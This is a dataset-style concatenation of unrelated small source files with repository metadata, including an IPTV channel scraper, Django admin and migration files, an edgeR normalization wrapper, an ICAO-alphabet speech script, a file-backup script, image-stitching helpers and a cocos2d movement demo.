7b4ea0f4ff1d23cb5acb9a1696155e58d41a06ed | deb3c16ef887b6c496b8c920809d79b9f73aa2fe | /libs/telewizjaonline.py | 3ff44fd184c1e68bbc06dccfa2babf9394c94358 | [] | no_license | Yaser7440/cmdline_iptvplayer | 1ea35f4fd36c708176a43d402a49342c4cf723a5 | 4e287021d86cab8d6525262b647d144c6141d6b1 | refs/heads/master | 2021-01-24T10:49:29.278730 | 2016-09-21T09:24:26 | 2016-09-21T09:24:26 | null | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 4,018 | py | # -*- coding: utf-8 -*-
###################################################
# LOCAL import
###################################################
from Plugins.Extensions.IPTVPlayer.dToolsSet.iptvplayerinit import TranslateTXT as _
from Plugins.Extensions.IPTVPlayer.dToolsSet.iptvtools import printDBG, printExc, GetCookieDir
from Plugins.Extensions.IPTVPlayer.tools.iptvtypes import strwithmeta
from Plugins.Extensions.IPTVPlayer.libs.pCommon import common
from Plugins.Extensions.IPTVPlayer.libs.urlparser import urlparser
###################################################
###################################################
# FOREIGN import
###################################################
from Components.config import config, ConfigSelection, ConfigYesNo, ConfigText, getConfigListEntry
import re
try: import simplejson as json
except: import json
from os import path as os_path
############################################
###################################################
# E2 GUI COMMPONENTS
###################################################
from Plugins.Extensions.IPTVPlayer.components.asynccall import MainSessionWrapper
###################################################
###################################################
# Config options for HOST
###################################################
# Channel-list sort order shown in the plugin settings (exposed via
# GetConfigList below); the chosen value is appended as the ?orderby=
# query parameter when fetching channel lists.
config.plugins.iptvplayer.telewizjaonline_sort = ConfigSelection(default = "date", choices = [("date", "Date"), ("ostatnio-ogladane", "ostatnio oglądane"), ("title", "Title"), ("view", "Views"), ("like", "Likes"), ("comment", "Comments")])
def GetConfigList():
    """Return this host's entries for the IPTV player settings screen."""
    return [
        getConfigListEntry("Sortuj kanały według:", config.plugins.iptvplayer.telewizjaonline_sort),
    ]
###################################################
class TelewizjaOnline:
    """Scraper for telewizja-online.pl.

    Categories, channel lists and stream links are extracted from the
    site's HTML with regexes and the IPTVPlayer helper utilities.
    """
    # Base site URL; also used as the Referer header.
    MAINURL = 'http://telewizja-online.pl/'
    HTTP_HEADER = { 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0', 'Referer': MAINURL }
    def __init__(self):
        # Framework helpers: HTTP fetching/parsing and stream auto-detection.
        self.cm = common()
        self.up = urlparser()
    def getCategoriesList(self):
        """Return [{'url', 'title'}, ...] scraped from the main page's
        'Kategorie Stacji TV' menu; empty list when the fetch fails."""
        printDBG("TelewizjaOnline.getCategoriesList")
        catsList = []
        sts,data = self.cm.getPage(TelewizjaOnline.MAINURL)
        if not sts: return catsList
        data = self.cm.ph.getDataBeetwenMarkers(data, 'Kategorie Stacji TV', '</ul>', False)[1]
        # Each menu entry: <a href="...">name</a>
        data = re.compile('<a[^>]+?href="([^"]+?)"[^>]*?>([^<]+?)<').findall(data)
        for item in data:
            catsList.append({'url':item[0], 'title':item[1]})
        return catsList
    def getChannelsList(self, baseUrl):
        """Return [{'title', 'url', 'icon'}, ...] for a category page;
        the configured sort is passed as the ?orderby= query parameter."""
        printDBG("TelewizjaOnline.getChannelsList baseUrl[%s]" % baseUrl )
        channelsList = []
        url = baseUrl + '?orderby=' + config.plugins.iptvplayer.telewizjaonline_sort.value
        sts,data = self.cm.getPage(url)
        if not sts: return channelsList
        # Channels are rendered as bootstrap columns; split on the column div.
        data = self.cm.ph.getDataBeetwenMarkers(data, '<div class="col-md-3', '<center>', False)[1]
        data = data.split('<div class="col-md-3')
        for item in data:
            title = self.cm.ph.getSearchGroups(item, 'title="([^"]+?)"')[0]
            url = self.cm.ph.getSearchGroups(item, 'href="([^"]+?)"')[0]
            icon = self.cm.ph.getSearchGroups(item, 'src="(http[^"]+?)"')[0]
            channelsList.append({'title':title, 'url':url, 'icon':icon})
        return channelsList
    def getVideoLink(self, baseUrl):
        """Resolve playable stream link(s) for a channel page by handing
        the embedded player <iframe> URL to the framework auto-detector."""
        printDBG("TelewizjaOnline.getVideoLink url[%s]" % baseUrl)
        def _url_path_join(a, b):
            # Python 2 urlparse; imported lazily inside the helper.
            from urlparse import urljoin
            return urljoin(a, b)
        sts,data = self.cm.getPage(baseUrl)
        if not sts: return []
        data = self.cm.ph.getDataBeetwenMarkers(data, '<div id="player-embed">', '<div class="player-button">', False)[1]
        url = self.cm.ph.getSearchGroups(data, '<iframe[^>]+?src="([^"]+?)"')[0]
        if '' != url:
            # An iframe URL was found: the raw page HTML is no longer needed.
            data = None
        return self.up.getAutoDetectedStreamLink(url, data)
| [
"zdzislaw22@windowslive.com"
] | zdzislaw22@windowslive.com |
42c98f0b561f8d2986b82ba15ae715161e168de9 | bca8fa75d214db54ab436014bb4bfc55f5df360c | /main/admin.py | ed19c663a8825d68491ebe3f78791cd64ecea49d | [] | no_license | daniiarandashov/resto | aa0d031d9e6ab49fce37f785bca16c567d862f3f | b5fe1789e1bbeaa869e559f3cb821124797cd94e | refs/heads/master | 2023-02-17T16:24:36.335840 | 2021-01-16T12:00:06 | 2021-01-16T12:00:06 | 330,132,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | from django.contrib import admin
from .models import UserProfile,Feedback,Comment
# Make the app's models manageable through the Django admin site.
for _model in (UserProfile, Feedback, Comment):
    admin.site.register(_model)
| [
"daniiarandashov@gmail.com"
] | daniiarandashov@gmail.com |
ceb28f20a61e6dbcb21f99d264dc43cef9224028 | 8fc944deb49190afb54116f67e7de430dc0d96ba | /read_data/library_size_normalization.py | 1b9bdad930ad4f24326880eb9d528fb655f6f708 | [
"MIT"
] | permissive | fuhrmanj/TRANSACT_manuscript | 9cafa6727d314d9ac92fc19a9235f4f97488e950 | 71ca2ec42bdd5d547d4b965aa7f84838bfd5b812 | refs/heads/main | 2023-01-09T22:57:59.223066 | 2020-10-12T08:24:45 | 2020-10-12T08:24:45 | 310,045,794 | 0 | 0 | MIT | 2020-11-04T15:40:58 | 2020-11-04T15:40:57 | null | UTF-8 | Python | false | false | 2,308 | py | import numpy as np
from sklearn.preprocessing import StandardScaler
import rpy2
import rpy2.robjects as robjects
import rpy2.robjects.numpy2ri
from rpy2.robjects.packages import importr
class NormalizationParameter():
    """Container for library-size normalization state.

    Attributes:
        parameters: edgeR normalization factors (an R object) computed by
            TMM_normalization; None until first computed.
        scaler: optional fitted scaler — presumably sklearn's
            StandardScaler given the module import; unused in this file's
            visible code (TODO confirm with callers).
    """

    def __init__(self, parameters=None, scaler=None):
        self.parameters = parameters
        self.scaler = scaler
        # (removed a dead trailing ``pass`` statement)
def TMM_normalization(count_data, return_instance=False, coef=None):
    """
    Use TMM for library size normalization. Makes use of an R wrapper to call
    edgeR and perform the library size norm.

    Parameters
    -------
    count_data: np.ndarray (int or float)
        Genomic matrix with samples in the rows.
    return_instance: bool, default to False
        Whether should return NormalizationParameter, useful for remembering the
        computed normalization parameters.
    coef: NormalizationParameter, default to None
        Normalization coefficients already computed. If not None, then the software
        will not compute coefficients and put coef as given here.

    Returned Values
    -------
    np.ndarray with samples in the rows; when return_instance is True, a
    (array, NormalizationParameter) tuple instead.
    """
    # A NormalizationParameter instance is always truthy, so this only
    # builds a fresh one when coef is None.
    coef = coef or NormalizationParameter()
    # Custom import: route numpy arrays into R and load edgeR.
    rpy2.robjects.numpy2ri.activate()
    importr('edgeR')
    # Transform the input count data and feed it to R
    # (transposed: genes in rows on the R side).
    n_samples, n_genes = count_data.shape
    count_cell_lines_R = robjects.r.matrix(count_data.transpose(), nrow=n_genes, ncol=n_samples)
    robjects.r.assign("count_data", count_cell_lines_R)
    robjects.r('''
    D <- DGEList(counts=count_data)
    ''')
    # Recompute the coefficients if asked, use precomputed otherwise.
    if coef.parameters is None:
        robjects.r('''
        #TMM normalization
        Dnorm <- calcNormFactors(D)
        ''')
        coef.parameters = robjects.r["Dnorm"]
    else:
        robjects.r.assign('Dnorm', coef.parameters)
    # Run TMM normalization with API.
    X_TMM = robjects.r('''
    rellibsize <- colSums(D$counts)/exp(mean(log(colSums(D$counts))))
    nf = Dnorm$samples[,3]*rellibsize
    TMM_normalized_data = round(sweep(D$counts, 2, nf, "/"))
    ''')
    if not return_instance:
        # Transpose it back to have it in a scikit-learn format.
        return X_TMM.transpose()
    return X_TMM.transpose(), coef
"soufiane.mourragui@free.fr"
] | soufiane.mourragui@free.fr |
3bb772842726bdb60f03a1314d320bb52bd637ee | b721a2744096c5cc44d22eb303e0fc288c8c3679 | /contact/migrations/0001_initial.py | c814fc5c68537ffee6dfcae8d9e3d6727a3a64b5 | [] | no_license | Rasel120/Python-blog-project | 91cacdb12834bbcfea2b9b3a64153952d94d5d04 | 20e1561d06eb9ab6144bb50101b061acf9680914 | refs/heads/main | 2023-06-05T08:22:25.509881 | 2021-06-17T09:21:04 | 2021-06-17T09:21:04 | 375,974,709 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,210 | py | # Generated by Django 3.2.4 on 2021-06-16 11:35
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations; avoid hand-editing beyond
    # comments so the recorded schema keeps matching the migration history.
    initial = True
    dependencies = [
    ]
    operations = [
        # Messages submitted through the site's contact form.
        migrations.CreateModel(
            name='contact',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('email', models.TextField(max_length=30)),
                ('subject', models.TextField(max_length=80)),
                ('description', models.TextField(max_length=900)),
            ],
        ),
        # Static contact-page details (location, addresses, phone numbers).
        migrations.CreateModel(
            name='information',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('location', models.CharField(max_length=80)),
                ('email', models.TextField(max_length=30)),
                ('email2', models.TextField(max_length=30)),
                ('call', models.CharField(max_length=15)),
                ('call2', models.CharField(max_length=15)),
            ],
        ),
    ]
| [
"raselhossain120@gmail.com"
] | raselhossain120@gmail.com |
a832096e542afe309fcca3c34230d78766301154 | 2ffbdaca744e6a842db4dd811688508855a20e32 | /venv/bin/easy_install-2.7 | a60f31fbc646ca78e84bbe39ff4040f9dfb33442 | [] | no_license | mparavak/Hackathon-79 | c3ba245a2497454b5706348e13c23036defd39ce | b92fab045b8fd5ab569ec6c829a6c3227fd7a8f8 | refs/heads/master | 2020-09-09T16:29:06.530563 | 2019-11-15T08:42:01 | 2019-11-15T08:42:01 | 221,496,319 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | 7 | #!/Users/mparavak/Play-ground/hackathone/venv/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # Console-script shim generated by setuptools: normalise argv[0]
    # (strip a trailing "-script.py"/"-script.pyw" or ".exe") and hand
    # off to setuptools' easy_install main(), exiting with its status.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"mparavak@cisco.com"
] | mparavak@cisco.com |
ea1e5c9e5b85c1fa79f1cb44ff6cdb596859bb30 | f9b85ca1565bad4da34a99edd0a3ddf555b3beb1 | /Python/Python_Exercise/Python_Exercise1/ex35.py | f3e8b5f0f8f7b336dcf696ff3ed5bc785b95fa5a | [] | no_license | akjadon/HH | baab2209fbeee80625c451e66606cad4c7a0a4f5 | f6664c62c62811e280e1460241936cb526974661 | refs/heads/master | 2023-05-15T00:01:34.580015 | 2023-05-07T15:44:25 | 2023-05-07T15:44:25 | 191,207,450 | 56 | 76 | null | 2022-06-22T05:07:51 | 2019-06-10T16:43:35 | Jupyter Notebook | UTF-8 | Python | false | false | 2,507 | py | """The International Civil Aviation Organization (ICAO) alphabet assigns
code words to the letters of the English alphabet acrophonically
(Alfa for A, Bravo for B, etc.) so that critical combinations of letters
(and numbers) can be pronounced and understood by those who transmit and
receive voice messages by radio or telephone regardless of their native
language, especially when the safety of navigation or persons is essential.
Here is a Python dictionary covering one version of the ICAO alphabet:
d = {'a':'alfa', 'b':'bravo', 'c':'charlie', 'd':'delta', 'e':'echo',
'f':'foxtrot', 'g':'golf', 'h':'hotel', 'i':'india', 'j':'juliett',
'k':'kilo', 'l':'lima', 'm':'mike', 'n':'november', 'o':'oscar',
'p':'papa', 'q':'quebec', 'r':'romeo', 's':'sierra', 't':'tango',
'u':'uniform', 'v':'victor', 'w':'whiskey', 'x':'x-ray', 'y':'yankee',
'z':'zulu'}
Your task in this exercise is to write a procedure speak_ICAO() able to
translate any text (i.e. any string) into spoken ICAO words. You need to
import at least two libraries: os and time. On a mac, you have access to
the system TTS (Text-To-Speech) as follows: os.system('say ' + msg), where
msg is the string to be spoken. (Under UNIX/Linux and Windows, something
similar might exist.) Apart from the text to be spoken, your procedure
also needs to accept two additional parameters: a float indicating the
length of the pause between each spoken ICAO word, and a float indicating
the length of the pause between each word spoken."""
import time, os
from string import punctuation
# ICAO spelling alphabet: one code word per English letter.
d = {'a':'alfa', 'b':'bravo', 'c':'charlie', 'd':'delta', 'e':'echo',
     'f':'foxtrot', 'g':'golf', 'h':'hotel', 'i':'india', 'j':'juliett',
     'k':'kilo', 'l':'lima', 'm':'mike', 'n':'november', 'o':'oscar',
     'p':'papa', 'q':'quebec', 'r':'romeo', 's':'sierra', 't':'tango',
     'u':'uniform', 'v':'victor', 'w':'whiskey', 'x':'x-ray', 'y':'yankee',
     'z':'zulu'}
def icao(txt, icao_pause=1, word_pause=3):
    """Speak *txt* letter-by-letter as ICAO code words via the system TTS.

    Args:
        txt: the string to spell out.
        icao_pause: seconds to wait after each spoken code word.
        word_pause: seconds to wait after each word of *txt*.

    Any character without a code word (punctuation, digits, ...) is
    skipped — the original only filtered punctuation and raised KeyError
    on digits. Uses the macOS ``say`` command via os.system.
    """
    for word in txt.split(): # For every word in the provided string
        for char in word: # For every character in the word
            code = d.get(char.lower())
            if code is None:
                continue # no ICAO word for this character
            os.system('say ' + code)
            time.sleep(icao_pause) # The wait time after every letter
        time.sleep(word_pause) # The wait time after every word
#test
icao("Hello world, hi, I'm Nick!", 0.10, 1)
icao("The quick brown Fox jumps over the laZy Dog!") | [
"aniljadon.jadon@gmail.com"
] | aniljadon.jadon@gmail.com |
a3ef5a797e9f1b6569ec306baa65e43624e201b4 | 2a57bbf56f1a132cd401f9f6280a14031b50d2f2 | /Ecommerce/users/migrations/0001_initial.py | 5196bd6b9f550386ace7ce7e59bb538412251fe5 | [] | no_license | harshpjoshi/Django-Projects | 1664738e89d92c90b49638d7670bd1c44fe79c7a | 561b7b0ab25275d8c2bcf1c0ab92e84ac40182ab | refs/heads/master | 2020-07-02T05:28:30.006458 | 2019-08-09T08:08:47 | 2019-08-09T08:08:47 | 201,426,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # Generated by Django 2.2.4 on 2019-08-04 12:55
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations; edit comments only so the
    # recorded schema keeps matching the migration history.
    initial = True
    dependencies = [
        # Profile links 1:1 to the (swappable) user model, so that model's
        # initial migration must run first.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        # Per-user profile: avatar image plus the owning user.
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('image', models.ImageField(default='default.jpg', upload_to='profile_pics')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"harshjoshi989@gmail.com"
] | harshjoshi989@gmail.com |
5b8d8fd74c0847bd79b0fb380de54ed2ea9f6bb2 | e027a6aacf256bee8abf2eafc82b7fd4b879f3d6 | /Crud/forms.py | 997fe7754a2d06f01f7d828f538de218bb068375 | [] | no_license | Yelzhan04/CrudApi | 5094e4c911adc05973df106ff474cca2109dc306 | 877e56625e566111b8add045e1be1d7c51f7b908 | refs/heads/master | 2022-09-09T20:01:24.300112 | 2020-05-23T21:52:05 | 2020-05-23T21:52:05 | 266,425,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | from django import forms
from .models import Post
class PostForm(forms.ModelForm):
    """ModelForm that exposes every field of the Post model."""

    class Meta:
        model = Post
        fields = "__all__"
| [
"eljan00.kz@gmail.com"
] | eljan00.kz@gmail.com |
7782bfdeeddfc565dde400c5cb74f00a511883a0 | 28bb6f38b61f72cbebfed156a4edd7424ef204cf | /shipping/admin.py | 20cf06efb29fd87592037033a07f92a96cd17ad5 | [] | no_license | hodortaras/Test_red | 7ebe7bffc1866de7b77eaec4b07eae52e582eef8 | 806d485290a5be7c494797e15fcc64ff8ee2a49a | refs/heads/master | 2022-11-24T05:46:56.096128 | 2020-01-21T22:14:16 | 2020-01-21T22:14:16 | 235,436,866 | 0 | 0 | null | 2022-11-22T05:15:35 | 2020-01-21T20:38:17 | JavaScript | UTF-8 | Python | false | false | 482 | py | from django.contrib import admin
from .models import Order, OrderItem
class OrderItemInline(admin.TabularInline):
    # Edit an order's line items inline on the Order admin page.
    model = OrderItem
    # Raw-ID widget for product avoids loading every product into a dropdown.
    raw_id_fields = ['product']
class OrderAdmin(admin.ModelAdmin):
    # Columns shown in the order changelist.
    list_display = ['id', 'name', 'email',
                    'address', 'phone', 'paid',
                    'created', 'updated', 'shipping_options']
    # Sidebar filters for payment state and timestamps.
    list_filter = ['paid', 'created', 'updated']
    # Line items are edited inline via OrderItemInline.
    inlines = [OrderItemInline]
admin.site.register(Order, OrderAdmin)
| [
"dvalindvorf@gmail.com"
] | dvalindvorf@gmail.com |
651a8d2fb009e24b0791b25c910e348e012e7af6 | dca23c8d1f8014e7f992b9afdcbb130aababc1f9 | /test_functions.py | 3e5ef178a1a0e6bdec3a222dd059ce115b9238d8 | [] | no_license | anshulsinghh/hoursonleague | 8c422534d5c8a5a0c5567f4c09fbdb809383e3e0 | c732f69186c0b168bc9de2a37e762f64d3cd1d4b | refs/heads/master | 2021-04-23T12:31:49.549185 | 2020-07-25T22:47:06 | 2020-07-25T22:47:06 | 249,925,571 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,556 | py | from datetime import timedelta
from module import get_analysis, get_hours_and_minutes
"""
This function tests the get_analysis function in the module file
"""
def test_get_analysis():
    """Exercise get_analysis() across every hour-threshold band."""
    assert callable(get_analysis) # Check if the function is callable
    # Check that for inputs from 0 to 14, that the output is a string
    for i in range(0, 15):
        assert isinstance(get_analysis(i), str)
    # These strings are used to test if the outputs of the function are correct
    did_well = '\n😁 Great Job! Looks like you have been really' + \
        ' productive last week.'
    did_alright = '\n🙂 Looks like you have been pretty productive last ' + \
        'week. You might want to limit your hours for next week to' + \
        ' increase productivity even more!'
    did_poorly = '\n😦 Seems like you play a lot! Definitely try limiting ' + \
        'your hours to be more productive.'
    did_horrible = '\n😡 You should really limit your hours, you probably' + \
        ' cannot get much work done if you play this much.'
    # For any input less than 2, the string did_well should be returned
    for i in range (-20, 2):
        assert get_analysis(i) == did_well
    # For any input >= 2 and < 6, the string did_alright should be returned
    for i in range(2, 6):
        assert get_analysis(i) == did_alright
    # For any input >= 6 and < 11, the string did_poorly should be returned
    for i in range(6, 11):
        assert get_analysis(i) == did_poorly
    # For any input >= 11 and < 20, the string did_horrible should be returned
    for i in range(11, 20):
        assert get_analysis(i) == did_horrible
    # Test that the proper values are still returned with floating point values
    # NOTE(review): 1.2 < 2 yet did_alright is expected here — get_analysis
    # presumably rounds fractional hours up; confirm against the module.
    assert get_analysis(1.2) == did_alright
    assert get_analysis(10.2) == did_horrible
    assert get_analysis(8.2) == did_poorly
"""
This function tests the get_hours_and_minutes function in the module file
"""
def test_get_hours_and_minutes():
assert callable(get_hours_and_minutes) # CHeck if the function is callable
# Loop through hours from -100 to 99
for hours in range(-100, 100):
# Loop through minutes from 0 to 59 (if minutes = 60 it will wrap around to
# be a new hour)
for minutes in range(0, 60):
# Create a new timedelta object
delta = timedelta(hours=hours, minutes=minutes)
#Check that the hours and minutes match
assert get_hours_and_minutes(delta) == [hours, minutes]
#Check that the value returned is a list
assert isinstance(get_hours_and_minutes(delta), list) | [
"noreply@github.com"
] | noreply@github.com |
def max_water_trapped(walls):
    """Return the largest area of water held between any two walls
    (container-with-most-water, two-pointer scan, O(n))."""
    left, right = 0, len(walls) - 1
    best = 0
    while left < right:
        area = (right - left) * min(walls[left], walls[right])
        if area > best:
            best = area
        # Move the shorter side inward: keeping it can only shrink the
        # area as the width decreases.
        if walls[left] < walls[right]:
            left += 1
        else:
            right -= 1
    return best
def main():
    """Print max_water_trapped() results for a few sample wall arrays."""
    test_cases = [
        [1, 2, 1, 3, 4, 4, 5, 6, 2, 1, 3, 1, 3, 2, 1, 2, 4, 1],
        [1, 1, 1, 1, 1],
        [100, 100],
    ]
    for heights in test_cases:
        print('Running on input:', heights)
        print('Result:', max_water_trapped(heights))
        print()


main()
| [
"rymarr@tuta.io"
] | rymarr@tuta.io |
d0e9ac32ea79140d1cf38d1451aa72f8f0ee96a7 | 9db35a0ffb82a5a1c41a098fc14524cd9c98a8c2 | /main.py | b38f6f46f58f5508518562e52d0b64dcf030851c | [
"MIT"
] | permissive | Sirius-Bell/backup_your_files | fd08b9e914e028b0ff06c0517d621e95a525b659 | ef8ed89489d18562d097dfdb5c51daa0f5c1474c | refs/heads/master | 2023-07-07T02:03:54.045580 | 2019-11-24T19:55:11 | 2019-11-24T19:55:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,011 | py | #Python 3.8.0
#Make by Lonely Dark
import argparse
import os
parser = argparse.ArgumentParser()
parser.add_argument('-r', '--recursive', help='recursive add files', action='store_true')
parser.add_argument('-d', '--directory', help='directory where the files(or file) are. If file one, input file with full name', required=True)
args = parser.parse_args()


def _copy_file(source, target):
    # Byte-for-byte copy; ``with`` closes both handles even on error
    # (the original leaked them whenever read/write raised).
    with open(source, 'rb') as src, open(target, 'wb') as dst:
        dst.write(src.read())


if args.recursive:
    # Back up every file in the directory — and one level of
    # sub-directories, as before — as backup_<name> next to the original.
    os.chdir(args.directory)
    for entry in os.listdir():
        if os.path.isdir(entry):
            # The original detected directories by catching PermissionError
            # from open(); on POSIX open() raises IsADirectoryError instead,
            # so test explicitly. Nested sub-directories are skipped rather
            # than crashing.
            for name in os.listdir(entry):
                sub = os.path.join(entry, name)
                if os.path.isfile(sub):
                    _copy_file(sub, os.path.join(entry, 'backup_' + name))
        else:
            _copy_file(entry, 'backup_' + entry)
else:
    # Single-file mode: write <base>_backup<ext>. os.path.splitext keeps
    # the full base path intact, unlike the original split('.') which
    # broke on names with more than one dot and crashed on none.
    base, ext = os.path.splitext(args.directory)
    _copy_file(args.directory, base + '_backup' + ext)
| [
"vlad10game@gmail.com"
] | vlad10game@gmail.com |
edb713de802c8b7fb038ec61f997ca5c7f5cc79c | 5911e6935bd21da01246cc4fe4db362921f703bc | /image_stitch/utilities.py | c06d225691eaa0a98fbc6089ffaa43fe2a159dcf | [] | no_license | siadajpan/profile_stitching | 5be005aab43d857eaf38e2d97ae51de05b0d38c8 | c2d511543c1ef640a53c8366edb3d3b84c3e27bb | refs/heads/master | 2020-03-31T08:53:36.556256 | 2019-02-19T16:05:19 | 2019-02-19T16:05:19 | 152,075,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,331 | py | import numpy as np
import cv2
def get_dark_cols(img):
    """Find slice bounds trimming near-black columns from both sides.

    Returns (start_col, end_col) intended for img[:, start_col:end_col]:
    end_col is negative (counted from the right) when dark columns were
    found on the right edge, or cols + 1 (keep everything) when not.
    Python 2 module (print statement below).
    """
    (rows, cols, ch) = img.shape
    # Scan from the left for the first column brighter than the threshold.
    for start_col in range(cols):
        if img[:, start_col, :].mean() > 5:
            break
    # Scan from the right likewise.
    # NOTE(review): the first probe uses -0, which indexes column 0 (the
    # left edge); the scan was probably meant to start at 1 — confirm.
    for end_col in range(cols):
        if img[:, -end_col, :].mean() > 5:
            break
    print 'start: %s, end: %s' %(start_col, end_col)
    if end_col == 0:
        # No dark right edge found: keep every column.
        end_col = cols + 1
    else:
        end_col = -end_col
    return start_col, end_col
def preprocess_images(imageA, imageB, ratio):
    """Trim shared dark borders, rotate both images by -90 degrees, and
    return each alongside a *ratio*-scaled copy used for stitching.

    Assumes imageA and imageB share the same shape: the crop bounds come
    from imageA only — TODO confirm with callers.
    """
    # get rid of dark left and right
    (start_col, end_col) = get_dark_cols(imageA)
    imageA = imageA[:, start_col:end_col]
    imageB = imageB[:, start_col:end_col]
    # rotate the images
    (rows,cols, channels) = imageA.shape
    M = cv2.getRotationMatrix2D((cols/2,rows/2),-90,1)
    # NOTE(review): both warps reuse imageA's rotation matrix but with
    # different output sizes ((rows, cols) vs (cols, rows)) — verify the
    # second call's size is intentional.
    imageA = cv2.warpAffine(imageA,M,(rows,cols))
    imageB = cv2.warpAffine(imageB,M,(cols,rows))
    #resize to speed up stitching
    new_sizes = (int(cols * ratio), int(rows * ratio))
    imageA_stitch = cv2.resize(imageA, new_sizes)
    imageB_stitch = cv2.resize(imageB, new_sizes)
    return (imageA, imageA_stitch, imageB, imageB_stitch)
def create_result_array(imageA, no_of_images, ratio):
    """Allocate a black uint8 canvas wide enough to hold no_of_images
    preprocessed frames side by side (height/width taken from a trial
    run of preprocess_images on imageA)."""
    (imageA, a, b, c) = preprocess_images(imageA, imageA, ratio)
    result = np.zeros((imageA.shape[0], imageA.shape[1]*no_of_images, 3), dtype = 'uint8')
    #print 'height: ', result.shape[0]
    #print 'width: ', result.shape[1]
    return result
"siadajpan@o2.pl"
] | siadajpan@o2.pl |
4db6157cc5bc0c7c11ea4235146bea8a5a87a274 | 435a524191c2611d7abb7390a8422e8f15a93065 | /PYTHON/Learn Python/Level_0/Challenges/Solutions/12) Lists 2.py | 556e862f46b381f20f15ba67c3f853f714716e77 | [] | no_license | huezune2000/Learn-Python-Offline | 565b52b092f043286ca886d6ae173ae4a61b3857 | d1c8be29cda2be34fd8e9bdc439c285c92f34a98 | refs/heads/master | 2021-05-27T01:59:18.405553 | 2014-03-08T03:52:57 | 2014-03-08T03:52:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | ###
#12) Lists 2 Solution
###
# Same values as the original append() loop, built with a comprehension.
l = [x**3 + 2*x for x in range(10)]
print(l)
| [
"itcaughtonj@gmail.com"
] | itcaughtonj@gmail.com |
8f240bfbf9e8882f118cf1a7b284cca910bf6864 | 644fdc72cb9f13a8101f0efcc9ab6ec5f3f8f250 | /project/yeet.py | 080c431e527c3e84b0758e976eab0aa1e01c9efd | [] | no_license | TruthorPear/Island-Escape | 52f720dc09cc19bde4f8101ab19504a34c9836a2 | c252c863f717f8aff81af7780c982a529331052c | refs/heads/master | 2020-03-24T01:21:09.171161 | 2018-07-26T14:06:27 | 2018-07-26T14:06:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,506 | py | import pyglet
from pyglet.window import key
import cocos
from cocos import actions, layer, sprite, scene
from cocos.director import director
# Player class
class Me(actions.Move):
    """Per-frame movement action: maps arrow-key state (the module-global
    ``keyboard`` KeyStateHandler set up in main()) onto the target
    sprite's velocity."""
    # step() is called every frame.
    # dt is the number of seconds elapsed since the last call.
    def step(self, dt):
        super(Me, self).step(dt) # Run step function on the parent class.
        # Determine velocity based on keyboard inputs.
        # KeyStateHandler entries read as pressed=1 / released=0, so each
        # axis is -1000, 0 or +1000 pixels per second.
        velocity_x = 1000 * (keyboard[key.RIGHT] - keyboard[key.LEFT])
        velocity_y = 1000 * (keyboard[key.UP] - keyboard[key.DOWN])
        # Set the object's velocity.
        self.target.velocity = (velocity_x, velocity_y)
# Main class
def main():
    """Build the window, player sprite and scene, then start the game loop."""
    global keyboard # Declare this as global so it can be accessed within class methods.
    # Initialize the window.
    director.init(width=500, height=300, autoscale=False, resizable=True)
    # Create a layer and add a sprite to it.
    player_layer = layer.Layer()
    me = sprite.Sprite('eleph2.png')
    player_layer.add(me)
    # Set initial position and velocity.
    me.position = (100, 100)
    me.velocity = (0, 0)
    # Set the sprite's movement class.
    me.do(Me())
    # Create a scene and set its initial layer.
    main_scene = scene.Scene(player_layer)
    # Attach a KeyStateHandler to the keyboard object.
    keyboard = key.KeyStateHandler()
    director.window.push_handlers(keyboard)
    # Play the scene in the window (blocks until the window closes).
    director.run(main_scene)
if __name__ == '__main__':
    main()
| [
"noreply@github.com"
] | noreply@github.com |
0b2bc07bfe47ebc246deec181f61d7fa55a65b8f | e8d5471bd4a47794d66162060343f740e0febca4 | /server/src/uds/auths/RegexLdap/__init__.py | 4065f8086cf40c30d7e64bfeaa397d4232fd9e6e | [] | no_license | git38438/openuds | ef939c2196d6877e00e92416609335d57dd1bd55 | 7d66d92f85f01ad1ffd549304672dd31008ecc12 | refs/heads/master | 2020-06-22T14:07:33.227703 | 2019-07-18T11:03:56 | 2019-07-18T11:03:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2012 Virtual Cable S.L.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Virtual Cable S.L. nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
